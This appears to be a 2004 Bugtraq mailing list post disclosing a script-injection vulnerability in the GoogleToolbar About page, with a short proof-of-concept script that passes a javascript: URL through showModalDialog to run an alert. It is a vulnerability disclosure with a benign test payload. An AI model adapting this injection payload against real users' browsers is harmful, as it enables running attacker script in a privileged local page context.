Bugtraq mailing list archives
GoogleToolbar:About -- Allows Script Injection
From: ViPeR <viper31337 () yahoo co in>
Date: Fri, 17 Sep 2004 09:51:10 +0100 (BST)
Affection Software : GoogleToolbar Version : Tested on 2.0.114.1-big/en (GGLD) Notes: GoogleToolbar's About section allows injection of script, since it lacks any checking. The following code is a Proof Of Concept. <s c r i p t> window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML", "<div style=\"background-image: url(javascript:alert(location.href));\">"); </s c r i p t> rgds, Gregory R. Panakkal / Viper ________________________________________________________________________ Yahoo! India Matrimony: Find your life partner online Go to: http://yahoo.shaadi.com/india-matrimony
Current thread:
- GoogleToolbar:About -- Allows Script Injection ViPeR (Sep 17)
- Re: GoogleToolbar:About -- Allows Script Injection Rafel Ivgi, The-Insider (Sep 18)